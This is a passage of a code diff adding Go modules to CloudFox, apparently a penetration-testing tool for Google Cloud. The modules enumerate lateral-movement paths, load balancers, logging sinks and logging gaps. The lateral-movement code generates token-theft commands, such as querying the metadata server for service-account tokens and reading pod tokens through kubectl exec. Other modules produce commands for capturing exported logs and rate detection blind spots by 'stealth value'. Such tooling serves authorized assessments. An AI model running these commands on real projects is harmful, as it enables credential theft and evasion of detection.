--force-delete-tags`, + svc.Name, svc.ServiceAccount, svc.Region, + svc.Name, svc.Name, + projectID, projectID, + projectID, svc.Region, svc.ServiceAccount, projectID, + svc.Region, projectID, + svc.Region, projectID, + projectID) + + vector := TokenTheftVector{ + ResourceType: "cloud_run", + ResourceName: svc.Name, + ProjectID: projectID, + ServiceAccount: svc.ServiceAccount, + AttackVector: "container_execution", + RiskLevel: "HIGH", + ExploitCommand: exploitCmd, + } + + m.mu.Lock() + m.TokenTheftVectors = append(m.TokenTheftVectors, vector) + m.addTokenTheftVectorToLoot(vector) + m.mu.Unlock() + } +} + +// findGKEVectors finds GKE clusters/node pools where tokens can be stolen +func (m *LateralMovementModule) findGKEVectors(ctx context.Context, projectID string, logger internal.Logger) { + gkeService := GKEService.New() + + clusters, nodePools, err := gkeService.Clusters(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + gcpinternal.HandleGCPError(err, logger, GCP_LATERALMOVEMENT_MODULE_NAME, + fmt.Sprintf("Could not get GKE clusters in project %s", projectID)) + } + return + } + + // Track cluster SAs to avoid duplicates in node pools + clusterSAs := make(map[string]string) // clusterName -> SA + + for _, cluster := range clusters { + // Check node service account + if cluster.NodeServiceAccount != "" { + clusterSAs[cluster.Name] = cluster.NodeServiceAccount + + var exploitCmd string + if cluster.WorkloadIdentity != "" { + exploitCmd = fmt.Sprintf(`# Cluster uses Workload Identity - tokens are pod-specific +# Get credentials for cluster: +gcloud container clusters get-credentials %s --location=%s --project=%s +# Then exec into a pod and check for mounted SA token: +kubectl exec -it -- cat /var/run/secrets/kubernetes.io/serviceaccount/token`, + cluster.Name, cluster.Location, projectID) + } else { + exploitCmd = fmt.Sprintf(`# Cluster uses node SA (no Workload Identity) - all pods can access node SA +gcloud container clusters get-credentials %s --location=%s --project=%s +# Exec into any pod and steal node SA token: +kubectl exec -it -- curl -s -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"`, + cluster.Name, cluster.Location, projectID) + } + + vector := TokenTheftVector{ + ResourceType: "gke_cluster", + ResourceName: cluster.Name, + ProjectID: projectID, + ServiceAccount: cluster.NodeServiceAccount, + AttackVector: "pod_service_account", + RiskLevel: "HIGH", + ExploitCommand: exploitCmd, + } + + m.mu.Lock() + m.TokenTheftVectors = append(m.TokenTheftVectors, vector) + m.addTokenTheftVectorToLoot(vector) + m.mu.Unlock() + } + } + + // Process node pools with different SAs than their cluster + for _, np := range nodePools { + clusterSA := clusterSAs[np.ClusterName] + if np.ServiceAccount == "" || np.ServiceAccount == clusterSA { + continue // Skip if same as cluster SA or empty + } + + exploitCmd := fmt.Sprintf(`# Node pool %s uses specific SA +gcloud container clusters get-credentials %s --location=%s --project=%s +# Exec into pod running on this node pool and steal token`, + np.Name, np.ClusterName, np.Location, projectID) + + vector := TokenTheftVector{ + ResourceType: "gke_nodepool", + ResourceName: fmt.Sprintf("%s/%s", np.ClusterName, np.Name), + ProjectID: projectID, + ServiceAccount: np.ServiceAccount, + AttackVector: "pod_service_account", + RiskLevel: "HIGH", + ExploitCommand: exploitCmd, + } + + m.mu.Lock() + m.TokenTheftVectors = append(m.TokenTheftVectors, vector) + m.addTokenTheftVectorToLoot(vector) + m.mu.Unlock() + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *LateralMovementModule) initializeLootFiles() { + m.LootMap["impersonation-chains-commands"] = &internal.LootFile{ + Name: "impersonation-chains-commands", + Contents: "# Impersonation Chain Exploit Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["token-theft-commands"] = &internal.LootFile{ + Name: "token-theft-commands", + Contents: "# Token Theft Exploit Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *LateralMovementModule) addImpersonationChainToLoot(chain ImpersonationChain, projectID string) { + m.LootMap["impersonation-chains-commands"].Contents += fmt.Sprintf( + "# Impersonation: %s -> %s\n"+ + "# Path: %s\n"+ + "%s\n\n", + chain.StartIdentity, + chain.TargetSA, + strings.Join(chain.Path, " -> "), + chain.ExploitCommand, + ) +} + +func (m *LateralMovementModule) addTokenTheftVectorToLoot(vector TokenTheftVector) { + m.LootMap["token-theft-commands"].Contents += fmt.Sprintf( + "# Token Theft: %s (%s)\n"+ + "# Project: %s\n"+ + "# Service Account: %s\n"+ + "# Attack Vector: %s\n"+ + "%s\n\n", + vector.ResourceType, + vector.ResourceName, + vector.ProjectID, + vector.ServiceAccount, + vector.AttackVector, + vector.ExploitCommand, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *LateralMovementModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Impersonation chains table + // Reads: Source identity can perform action on target service account + chainsHeader := []string{ + "Source Identity", + "Action", + "Target Service Account", + "Impersonation Path", + } + + var chainsBody [][]string + for _, chain := range m.ImpersonationChains { + // Determine action based on exploit command + action := "impersonate (get token)" + if strings.Contains(chain.ExploitCommand, "keys create") { + action = "create key" + } + + chainsBody = append(chainsBody, []string{ + chain.StartIdentity, + action, + chain.TargetSA, + strings.Join(chain.Path, " -> "), + }) + } + + // Token theft vectors table + vectorsHeader := []string{ + "Project Name", + "Project ID", + "Source Resource Type", + "Source Resource Name", + "Action", + "Target Service Account", + } + + var vectorsBody [][]string + for _, vector := range m.TokenTheftVectors { + // Map attack vector to action description + action := vector.AttackVector + switch vector.AttackVector { + case "metadata_server": + action = "steal token (metadata)" + case "function_execution": + action = "steal token (function)" + case "container_execution": + action = "steal token (container)" + case "pod_service_account": + action = "steal token (pod)" + } + + vectorsBody = append(vectorsBody, []string{ + m.GetProjectName(vector.ProjectID), + vector.ProjectID, + vector.ResourceType, + vector.ResourceName, + action, + vector.ServiceAccount, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{} + + if len(chainsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "lateral-impersonation-chains", + Header: chainsHeader, + Body: chainsBody, + }) + logger.InfoM(fmt.Sprintf("[PENTEST] Found %d impersonation chain(s)", len(chainsBody)), GCP_LATERALMOVEMENT_MODULE_NAME) + } + + if len(vectorsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "lateral-token-theft", + Header: vectorsHeader, + Body: vectorsBody, + }) + } + + output := LateralMovementOutput{ + Table: tables, + Loot: lootFiles, + } + + // Build scopeNames using GetProjectName + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_LATERALMOVEMENT_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/loadbalancers.go b/gcp/commands/loadbalancers.go new file mode 100644 index 00000000..aba9f74f --- /dev/null +++ b/gcp/commands/loadbalancers.go @@ -0,0 +1,281 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + loadbalancerservice "github.com/BishopFox/cloudfox/gcp/services/loadbalancerService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPLoadBalancersCommand = &cobra.Command{ + Use: globals.GCP_LOADBALANCERS_MODULE_NAME, + Aliases: []string{"lb", "lbs"}, + Short: "Enumerate Load Balancers", + Long: `Enumerate Load Balancers and related configurations. + +Features: +- Lists all forwarding rules (global and regional) +- Shows backend services and health checks +- Analyzes SSL policies for weak configurations +- Identifies external vs internal load balancers +- Checks for Cloud Armor security policies`, + Run: runGCPLoadBalancersCommand, +} + +type LoadBalancersModule struct { + gcpinternal.BaseGCPModule + LoadBalancers []loadbalancerservice.LoadBalancerInfo + SSLPolicies []loadbalancerservice.SSLPolicyInfo + BackendServices []loadbalancerservice.BackendServiceInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type LoadBalancersOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o LoadBalancersOutput) TableFiles() []internal.TableFile { return o.Table } +func (o LoadBalancersOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPLoadBalancersCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_LOADBALANCERS_MODULE_NAME) + if err != nil { + return + } + + module := &LoadBalancersModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + LoadBalancers: []loadbalancerservice.LoadBalancerInfo{}, + SSLPolicies: []loadbalancerservice.SSLPolicyInfo{}, + BackendServices: []loadbalancerservice.BackendServiceInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *LoadBalancersModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_LOADBALANCERS_MODULE_NAME, m.processProject) + + if len(m.LoadBalancers) == 0 { + logger.InfoM("No load balancers found", globals.GCP_LOADBALANCERS_MODULE_NAME) + return + } + + externalCount := 0 + for _, lb := range m.LoadBalancers { + if lb.Scheme == "EXTERNAL" { + externalCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d load balancer(s) (%d external), %d SSL policies, %d backend services", + len(m.LoadBalancers), externalCount, len(m.SSLPolicies), len(m.BackendServices)), globals.GCP_LOADBALANCERS_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *LoadBalancersModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating load balancers in project: %s", projectID), globals.GCP_LOADBALANCERS_MODULE_NAME) + } + + svc := loadbalancerservice.New() + + // Get load balancers + lbs, err := svc.ListLoadBalancers(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOADBALANCERS_MODULE_NAME, + fmt.Sprintf("Could not list load balancers in project %s", projectID)) + } else { + m.mu.Lock() + m.LoadBalancers = append(m.LoadBalancers, lbs...) + m.mu.Unlock() + } + + // Get SSL policies + sslPolicies, err := svc.ListSSLPolicies(projectID) + if err == nil { + m.mu.Lock() + m.SSLPolicies = append(m.SSLPolicies, sslPolicies...) + m.mu.Unlock() + } + + // Get backend services + backends, err := svc.ListBackendServices(projectID) + if err == nil { + m.mu.Lock() + m.BackendServices = append(m.BackendServices, backends...) + m.mu.Unlock() + } + + m.mu.Lock() + for _, lb := range lbs { + m.addToLoot(lb) + } + m.mu.Unlock() +} + +func (m *LoadBalancersModule) initializeLootFiles() { + m.LootMap["loadbalancers-commands"] = &internal.LootFile{ + Name: "loadbalancers-commands", + Contents: "# Load Balancer Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *LoadBalancersModule) addToLoot(lb loadbalancerservice.LoadBalancerInfo) { + m.LootMap["loadbalancers-commands"].Contents += fmt.Sprintf( + "## Load Balancer: %s (Project: %s)\n"+ + "# Type: %s, Scheme: %s, IP: %s, Port: %s\n\n", + lb.Name, lb.ProjectID, lb.Type, lb.Scheme, lb.IPAddress, lb.Port) + + // Describe forwarding rule + if lb.Region == "global" { + m.LootMap["loadbalancers-commands"].Contents += fmt.Sprintf( + "# Describe global forwarding rule:\n"+ + "gcloud compute forwarding-rules describe %s --global --project=%s\n\n", + lb.Name, lb.ProjectID) + } else { + m.LootMap["loadbalancers-commands"].Contents += fmt.Sprintf( + "# Describe regional forwarding rule:\n"+ + "gcloud compute forwarding-rules describe %s --region=%s --project=%s\n\n", + lb.Name, lb.Region, lb.ProjectID) + } + + // Backend service commands + for _, backend := range lb.BackendServices { + m.LootMap["loadbalancers-commands"].Contents += fmt.Sprintf( + "# Describe backend service:\n"+ + "gcloud compute backend-services describe %s --global --project=%s\n\n", + backend, lb.ProjectID) + } +} + +func (m *LoadBalancersModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Load Balancers table + lbHeader := []string{"Project Name", "Project ID", "Name", "Type", "Scheme", "Region", "IP Address", "Port", "Backend Services", "Security Policy"} + var lbBody [][]string + for _, lb := range m.LoadBalancers { + backends := "-" + if len(lb.BackendServices) > 0 { + backends = strings.Join(lb.BackendServices, ", ") + } + secPolicy := "-" + if lb.SecurityPolicy != "" { + secPolicy = lb.SecurityPolicy + } + lbBody = append(lbBody, []string{ + m.GetProjectName(lb.ProjectID), + lb.ProjectID, + lb.Name, + lb.Type, + lb.Scheme, + lb.Region, + lb.IPAddress, + lb.Port, + backends, + secPolicy, + }) + } + tables = append(tables, internal.TableFile{ + Name: "load-balancers", + Header: lbHeader, + Body: lbBody, + }) + + // SSL Policies table + if len(m.SSLPolicies) > 0 { + sslHeader := []string{"Project Name", "Project ID", "Name", "Min TLS Version", "Profile", "Custom Features"} + var sslBody [][]string + for _, policy := range m.SSLPolicies { + customFeatures := "-" + if len(policy.CustomFeatures) > 0 { + customFeatures = strings.Join(policy.CustomFeatures, ", ") + } + sslBody = append(sslBody, []string{ + m.GetProjectName(policy.ProjectID), + policy.ProjectID, + policy.Name, + policy.MinTLSVersion, + policy.Profile, + customFeatures, + }) + } + tables = append(tables, internal.TableFile{ + Name: "ssl-policies", + Header: sslHeader, + Body: sslBody, + }) + } + + // Backend Services table + if len(m.BackendServices) > 0 { + beHeader := []string{"Project Name", "Project ID", "Name", "Protocol", "Port", "Security Policy", "CDN Enabled", "Health Check", "Session Affinity", "Backends"} + var beBody [][]string + for _, be := range m.BackendServices { + secPolicy := "-" + if be.SecurityPolicy != "" { + secPolicy = be.SecurityPolicy + } + healthCheck := "-" + if be.HealthCheck != "" { + healthCheck = be.HealthCheck + } + sessionAffinity := "-" + if be.SessionAffinity != "" { + sessionAffinity = be.SessionAffinity + } + backends := "-" + if len(be.Backends) > 0 { + backends = strings.Join(be.Backends, ", ") + } + beBody = append(beBody, []string{ + m.GetProjectName(be.ProjectID), + be.ProjectID, + be.Name, + be.Protocol, + fmt.Sprintf("%d", be.Port), + secPolicy, + boolToYesNo(be.EnableCDN), + healthCheck, + sessionAffinity, + backends, + }) + } + tables = append(tables, internal.TableFile{ + Name: "backend-services", + Header: beHeader, + Body: beBody, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := LoadBalancersOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_LOADBALANCERS_MODULE_NAME) + } +} diff --git a/gcp/commands/logging.go b/gcp/commands/logging.go new file mode 100644 index 00000000..c89c9f6f --- /dev/null +++ b/gcp/commands/logging.go @@ -0,0 +1,473 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + LoggingService "github.com/BishopFox/cloudfox/gcp/services/loggingService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPLoggingCommand = &cobra.Command{ + Use: globals.GCP_LOGGING_MODULE_NAME, + Aliases: []string{"logs", "sinks", "log-sinks"}, + Short: "Enumerate Cloud Logging sinks and metrics with security analysis", + Long: `Enumerate Cloud Logging sinks and log-based metrics across projects. + +Features: +- Lists all logging sinks (log exports) +- Shows sink destinations (Storage, BigQuery, Pub/Sub, Logging buckets) +- Identifies cross-project log exports +- Shows sink filters and exclusions +- Lists log-based metrics for alerting +- Generates gcloud commands for further analysis + +Security Columns: +- Destination: Where logs are exported (bucket, dataset, topic) +- CrossProject: Whether logs are exported to another project +- WriterIdentity: Service account used for export +- Filter: What logs are included/excluded + +Attack Surface: +- Cross-project exports may leak logs to external projects +- Sink writer identity may have excessive permissions +- Disabled sinks may indicate log evasion +- Missing sinks may indicate lack of log retention`, + Run: runGCPLoggingCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type LoggingModule struct { + gcpinternal.BaseGCPModule + + Sinks []LoggingService.SinkInfo + Metrics []LoggingService.MetricInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type LoggingOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o LoggingOutput) TableFiles() []internal.TableFile { return o.Table } +func (o LoggingOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPLoggingCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_LOGGING_MODULE_NAME) + if err != nil { + return + } + + module := &LoggingModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Sinks: []LoggingService.SinkInfo{}, + Metrics: []LoggingService.MetricInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *LoggingModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_LOGGING_MODULE_NAME, m.processProject) + + if len(m.Sinks) == 0 && len(m.Metrics) == 0 { + logger.InfoM("No logging sinks or metrics found", globals.GCP_LOGGING_MODULE_NAME) + return + } + + // Count interesting sinks + crossProjectCount := 0 + disabledCount := 0 + for _, sink := range m.Sinks { + if sink.IsCrossProject { + crossProjectCount++ + } + if sink.Disabled { + disabledCount++ + } + } + + msg := fmt.Sprintf("Found %d sink(s), %d metric(s)", len(m.Sinks), len(m.Metrics)) + if crossProjectCount > 0 { + msg += fmt.Sprintf(" [%d cross-project]", crossProjectCount) + } + if disabledCount > 0 { + msg += fmt.Sprintf(" [%d disabled]", disabledCount) + } + logger.SuccessM(msg, globals.GCP_LOGGING_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *LoggingModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Logging in project: %s", projectID), globals.GCP_LOGGING_MODULE_NAME) + } + + ls := LoggingService.New() + + // Get sinks + sinks, err := ls.Sinks(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOGGING_MODULE_NAME, + fmt.Sprintf("Could not enumerate logging sinks in project %s", projectID)) + } else { + m.mu.Lock() + m.Sinks = append(m.Sinks, sinks...) + for _, sink := range sinks { + m.addSinkToLoot(sink) + } + m.mu.Unlock() + } + + // Get metrics + metrics, err := ls.Metrics(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOGGING_MODULE_NAME, + fmt.Sprintf("Could not enumerate log metrics in project %s", projectID)) + } else { + m.mu.Lock() + m.Metrics = append(m.Metrics, metrics...) + for _, metric := range metrics { + m.addMetricToLoot(metric) + } + m.mu.Unlock() + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d sink(s), %d metric(s) in project %s", len(sinks), len(metrics), projectID), globals.GCP_LOGGING_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *LoggingModule) initializeLootFiles() { + // Sinks loot files + m.LootMap["sinks-commands"] = &internal.LootFile{ + Name: "sinks-commands", + Contents: "# Cloud Logging Sinks Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["sinks-cross-project"] = &internal.LootFile{ + Name: "sinks-cross-project", + Contents: "# Cross-Project Log Exports\n# Generated by CloudFox\n# These sinks export logs to external projects\n\n", + } + m.LootMap["sinks-writer-identities"] = &internal.LootFile{ + Name: "sinks-writer-identities", + Contents: "# Logging Sink Writer Identities\n# Generated by CloudFox\n# Service accounts that have write access to destinations\n\n", + } + // Metrics loot files + m.LootMap["metrics-commands"] = &internal.LootFile{ + Name: "metrics-commands", + Contents: "# Cloud Logging Metrics Commands\n# Generated by CloudFox\n\n", + } +} + +func (m *LoggingModule) addSinkToLoot(sink LoggingService.SinkInfo) { + // Sinks commands file + m.LootMap["sinks-commands"].Contents += fmt.Sprintf( + "# Sink: %s (Project: %s)\n"+ + "# Destination: %s (%s)\n"+ + "gcloud logging sinks describe %s --project=%s\n", + sink.Name, sink.ProjectID, + sink.DestinationType, getDestinationName(sink), + sink.Name, sink.ProjectID, + ) + + // Add destination-specific commands + switch sink.DestinationType { + case "storage": + if sink.DestinationBucket != "" { + m.LootMap["sinks-commands"].Contents += fmt.Sprintf( + "gsutil ls gs://%s/\n"+ + "gsutil cat gs://%s/**/*.json 2>/dev/null | head -100\n", + sink.DestinationBucket, sink.DestinationBucket, + ) + } + case "bigquery": + if sink.DestinationDataset != "" { + destProject := sink.DestinationProject + if destProject == "" { + destProject = sink.ProjectID + } + m.LootMap["sinks-commands"].Contents += fmt.Sprintf( + "bq ls %s:%s\n"+ + "bq query --use_legacy_sql=false 'SELECT * FROM `%s.%s.*` LIMIT 100'\n", + destProject, sink.DestinationDataset, + destProject, sink.DestinationDataset, + ) + } + case "pubsub": + if sink.DestinationTopic != "" { + destProject := sink.DestinationProject + if destProject == "" { + destProject = sink.ProjectID + } + m.LootMap["sinks-commands"].Contents += fmt.Sprintf( + "gcloud pubsub subscriptions create log-capture --topic=%s --project=%s\n"+ + "gcloud pubsub subscriptions pull log-capture --limit=10 --auto-ack --project=%s\n", + sink.DestinationTopic, destProject, destProject, + ) + } + } + m.LootMap["sinks-commands"].Contents += "\n" + + // Cross-project exports + if sink.IsCrossProject { + filter := sink.Filter + if filter == "" { + filter = "(no filter - all logs)" + } + m.LootMap["sinks-cross-project"].Contents += fmt.Sprintf( + "# Sink: %s\n"+ + "# Source Project: %s\n"+ + "# Destination Project: %s\n"+ + "# Destination Type: %s\n"+ + "# Destination: %s\n"+ + "# Filter: %s\n"+ + "# Writer Identity: %s\n\n", + sink.Name, + sink.ProjectID, + sink.DestinationProject, + sink.DestinationType, + sink.Destination, + filter, + sink.WriterIdentity, + ) + } + + // Writer identities + if sink.WriterIdentity != "" { + m.LootMap["sinks-writer-identities"].Contents += fmt.Sprintf( + "# Sink: %s -> %s (%s)\n"+ + "%s\n\n", + sink.Name, sink.DestinationType, getDestinationName(sink), + sink.WriterIdentity, + ) + } +} + +func (m *LoggingModule) addMetricToLoot(metric LoggingService.MetricInfo) { + m.LootMap["metrics-commands"].Contents += fmt.Sprintf( + "# Metric: %s (Project: %s)\n"+ + "gcloud logging metrics describe %s --project=%s\n\n", + metric.Name, metric.ProjectID, + metric.Name, metric.ProjectID, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *LoggingModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Sinks table + sinksHeader := []string{ + "Project Name", + "Project ID", + "Sink Name", + "Destination Type", + "Destination", + "Cross-Project", + "Disabled", + "Writer Identity", + "Filter", + } + + var sinksBody [][]string + for _, sink := range m.Sinks { + // Format destination + destination := getDestinationName(sink) + + // Format cross-project + crossProject := "No" + if sink.IsCrossProject { + crossProject = fmt.Sprintf("Yes -> %s", sink.DestinationProject) + } + + // Format disabled + disabled := "No" + if sink.Disabled { + disabled = "Yes" + } + + // Format filter (no truncation) + filter := "-" + if sink.Filter != "" { + filter = normalizeFilter(sink.Filter) + } + + // Format writer identity + writerIdentity := "-" + if sink.WriterIdentity != "" { + writerIdentity = sink.WriterIdentity + } + + sinksBody = append(sinksBody, []string{ + m.GetProjectName(sink.ProjectID), + sink.ProjectID, + sink.Name, + sink.DestinationType, + destination, + crossProject, + disabled, + writerIdentity, + filter, + }) + } + + // Metrics table + metricsHeader := []string{ + "Project Name", + "Project ID", + "Metric Name", + "Description", + "Filter", + "Type", + } + + var metricsBody [][]string + for _, metric := range m.Metrics { + // Format filter (no truncation) + filter := "-" + if metric.Filter != "" { + filter = normalizeFilter(metric.Filter) + } + + // Format type + metricType := metric.MetricKind + if metric.ValueType != "" { + metricType += "/" + metric.ValueType + } + + // Format description (no truncation) + description := metric.Description + if description == "" { + description = "-" + } + + metricsBody = append(metricsBody, []string{ + m.GetProjectName(metric.ProjectID), + metric.ProjectID, + metric.Name, + description, + filter, + metricType, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build table files + tableFiles := []internal.TableFile{} + + if len(sinksBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_LOGGING_MODULE_NAME + "-sinks", + Header: sinksHeader, + Body: sinksBody, + }) + } + + if len(metricsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_LOGGING_MODULE_NAME + "-metrics", + Header: metricsHeader, + Body: metricsBody, + }) + } + + output := LoggingOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_LOGGING_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// Helper functions + +// getDestinationName returns a human-readable destination name +func getDestinationName(sink LoggingService.SinkInfo) string { + switch sink.DestinationType { + case "storage": + return sink.DestinationBucket + case "bigquery": + return sink.DestinationDataset + case "pubsub": + return sink.DestinationTopic + case "logging": + // Extract bucket name from full path + parts := strings.Split(sink.Destination, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return sink.Destination + default: + return sink.Destination + } +} + +// normalizeFilter normalizes a log filter for display (removes newlines but no truncation) +func normalizeFilter(filter string) string { + // Remove newlines + filter = strings.ReplaceAll(filter, "\n", " ") + filter = strings.ReplaceAll(filter, "\t", " ") + + // Collapse multiple spaces + for strings.Contains(filter, " ") { + filter = strings.ReplaceAll(filter, " ", " ") + } + + return strings.TrimSpace(filter) +} diff --git a/gcp/commands/logginggaps.go b/gcp/commands/logginggaps.go new file mode 100644 index 00000000..3aa77b7d --- /dev/null +++ b/gcp/commands/logginggaps.go @@ -0,0 +1,249 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + logginggapsservice "github.com/BishopFox/cloudfox/gcp/services/loggingGapsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPLoggingGapsCommand = &cobra.Command{ + Use: globals.GCP_LOGGINGGAPS_MODULE_NAME, + Aliases: []string{"log-gaps", "stealth", "blind-spots"}, + Short: "Find resources with missing or incomplete logging", + Long: `Identify logging gaps across GCP resources for stealth assessment. + +This module helps identify resources where actions may not be properly logged, +which is valuable for understanding detection blind spots. + +Resources Checked: +- Cloud Storage buckets (access logging) +- VPC subnets (flow logs) +- GKE clusters (workload and system logging) +- Cloud SQL instances (query and connection logging) +- Log sinks and exclusions (export gaps) +- Project-level audit logging configuration + +Output: +- Resources with disabled or partial logging +- Stealth value rating (CRITICAL, HIGH, MEDIUM, LOW) +- Specific missing log types +- Recommendations for defenders +- Commands for testing detection gaps + +Stealth Value Ratings: +- CRITICAL: No logging, actions completely invisible +- HIGH: Significant gaps enabling undetected activity +- MEDIUM: Some logging present but incomplete +- LOW: Minor gaps with limited stealth value`, + Run: runGCPLoggingGapsCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type LoggingGapsModule struct { + gcpinternal.BaseGCPModule + + Gaps []logginggapsservice.LoggingGap + AuditConfigs []*logginggapsservice.AuditLogConfig + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type LoggingGapsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o LoggingGapsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o LoggingGapsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPLoggingGapsCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_LOGGINGGAPS_MODULE_NAME) + if err != nil { + return + } + + module := &LoggingGapsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Gaps: []logginggapsservice.LoggingGap{}, + AuditConfigs: []*logginggapsservice.AuditLogConfig{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ 